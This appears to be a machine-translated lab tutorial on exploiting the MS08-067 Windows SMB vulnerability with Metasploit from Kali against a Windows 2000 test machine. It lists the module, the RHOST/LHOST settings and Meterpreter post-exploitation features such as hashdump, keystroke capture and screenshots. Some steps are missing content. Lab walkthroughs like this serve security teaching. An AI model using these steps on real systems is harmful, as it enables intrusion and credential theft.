Use Metaspoit to attack ms08-067
The ms08-067 vulnerability is all known as the Windows Server service RPC request buffer Overflow vulnerability, which could allow remote code execution if a user receives a specially crafted RPC request on an affected system.
On Microsoft Windows 2000Windows XP and Windows Server 2003 systems, an attacker may be able to run arbitrary code with this vulnerability without authentication, a vulnerability that could be used for a worm attack, and there is already a worm that exploits the vulnerability. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating outside the enterprise, and by default can establish an empty connection.
The attack on this experiment was Kali, and target drone was win2kserver.
1. View the attack IP address
Target drone IP
2, use Metasploit in Kali, first start PostgreSQL database service and Metasploit service
Service PostgreSQL start//Startup database
Service Metasploit start//Start Metasploit
3. Note Because there is no Metasploit in the high version Kali, you can use the following command to connect to the database service
Find out if there is a ms08-067 vulnerability and see the appropriate information returned
4. Enter the exploit using this vulnerability: command: use Exploit/windows/smb/ms08_067_netapi; after execution, the following is done:
5. Set the address of the target drone and attack aircraft
Set RHOST 192.168.11.40
Set Lhost 192.168.11.35
6. The next step is to implement the attack and execute the command exploit
Enclosed is an introduction to Meterpreter: http://www.xuebuyuan.com/1993953.html
Meterpretershell as a penetration module has a lot of useful functions, such as adding a user, hiding something, open the shell, get the user password, upload files to download remote host, run Cmd.exe, capture the screen, get remote control, capture key information, clear the application , displays the system information of the remote host, displays information such as the network interface and IP address of the remote machine.
7, using Meterpretershell as an example of the Penetration module 7.1, the target system to obtain the screen:
It's placed under the root path of your Kali.
Also can use command PS to get the system current list of processes, PWD get the current working directory and user ID, hashdump get target system password hash (password hash), etc., in the not repeat.
Use Metaspoit to attack ms08-067